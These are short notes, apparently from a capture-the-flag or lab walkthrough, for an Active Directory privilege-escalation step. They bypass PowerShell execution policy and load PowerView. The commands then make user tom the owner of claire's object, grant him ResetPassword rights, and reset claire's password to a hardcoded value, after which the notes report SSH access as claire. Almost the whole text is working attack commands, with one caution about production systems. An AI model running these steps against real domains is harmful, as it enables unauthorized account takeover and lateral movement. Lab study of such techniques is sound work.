powershell -ep bypass   
. .\PowerView.ps1 

### Set tom as the owner of claire’s ACL 

Set-DomainObjectOwner -identity claire -OwnerIdentity tom 

### Give tom permissions to change passwords on that ACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 

### Create powershell credential and change credentials. 
### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred

Copy

got ssh as claire